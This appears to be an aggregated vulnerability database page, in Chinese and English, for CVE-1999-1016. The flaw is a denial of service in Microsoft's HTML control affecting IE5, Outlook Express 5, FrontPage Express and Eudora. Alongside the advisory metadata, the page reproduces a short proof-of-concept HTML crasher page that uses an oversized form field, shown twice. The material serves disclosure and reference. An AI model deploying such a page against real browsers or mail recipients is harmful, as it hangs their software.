CVE-1999-1016
CVSS5.0
发布时间 :1999-08-27 00:00:00
修订时间 :2016-10-17 22:00:14
NMCOES    

[原文]Microsoft HTML control as used in (1) Internet Explorer 5.0, (2) FrontPage Express, (3) Outlook Express 5, and (4) Eudora, and possibly others, allows remote malicious web site or HTML emails to cause a denial of service (100% CPU consumption) via large HTML form fields such as text inputs in a table cell.


[CNNVD](1)Internet Explorer 5.0,(2)FrontPage Express,(3)Outlook Express 5,(4)Eudora以及其他可能软件下微软HTML控件拒绝服务漏洞(CNNVD-199908-056)

        (1)Internet Explorer 5.0,(2)FrontPage Express,(3)Outlook Express 5和(4)Eudora以及可能其他软件中的Microsoft HTML控件存在漏洞。远程恶意网站或者HTML邮件可借助大规模HTML表单字段,如单元格中的文本输入导致服务拒绝(100% CPU消耗)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:qualcomm:eudora
cpe:/a:microsoft:frontpage:::express
cpe:/a:microsoft:ie:5.0Microsoft Internet Explorer 5.0
cpe:/a:microsoft:outlook_express:5.0Microsoft outlook_express 5.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1016
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1016
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-056
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=ntbugtraq&m=93578772920970&w=2
(UNKNOWN)  NTBUGTRAQ  19990827 HTML code to crash IE5 and Outlook Express 5
http://www.securityfocus.com/bid/606
(VENDOR_ADVISORY)  BID  606

- 漏洞信息

(1)Internet Explorer 5.0,(2)FrontPage Express,(3)Outlook Express 5,(4)Eudora以及其他可能软件下微软HTML控件拒绝服务漏洞
中危 其他
1999-08-27 00:00:00 2005-10-20 00:00:00
远程  
        (1)Internet Explorer 5.0,(2)FrontPage Express,(3)Outlook Express 5和(4)Eudora以及可能其他软件中的Microsoft HTML控件存在漏洞。远程恶意网站或者HTML邮件可借助大规模HTML表单字段,如单元格中的文本输入导致服务拒绝(100% CPU消耗)。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19471)

Microsoft Internet Explorer 5.0 HTML Form Control DoS (EDBID:19471)
windows dos
1999-08-27 Verified
0 Neon Bunny
N/A [点击下载]
Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

source: http://www.securityfocus.com/bid/606/info

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to "hang" and consume 100% CPU resources until the application is closed. 

---{START SOURCE}---

<html>

<head>
<title>NeonBunny's IE5 Crasher</title>
</head>

<body>

<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

---{STOP SOURCE}--- 		

- 漏洞信息

8210
Microsoft HTML Control Large Form Field DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-08-27 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft HTML Form Control DoS Vulnerability
Failure to Handle Exceptional Conditions 606
Yes No
1999-08-27 12:00:00 2009-07-11 12:56:00
This vulnerability was posted to NTBugtraq by Neon Bunny <neonbunny@BUNNYBOX.NET>

- 受影响的程序版本

Microsoft Internet Explorer 5.0 for Windows NT 4
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
+ Microsoft Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95
+ Microsoft Windows 95

- 漏洞讨论

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to "hang" and consume 100% CPU resources until the application is closed.

- 漏洞利用

from NeonBunny's post to NTBugtraq:

---{START SOURCE}---

&lt;html&gt;

&lt;head&gt;
&lt;title&gt;NeonBunny's IE5 Crasher&lt;/title&gt;
&lt;/head&gt;

&lt;body&gt;

&lt;form method="POST"&gt;

&lt;table&gt;
&lt;tr&gt;
&lt;td width="20%"&gt;&lt;input type="text" name="State" size="99999999"
maxlength="99999999" value=""&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;

&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

---{STOP SOURCE}---

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站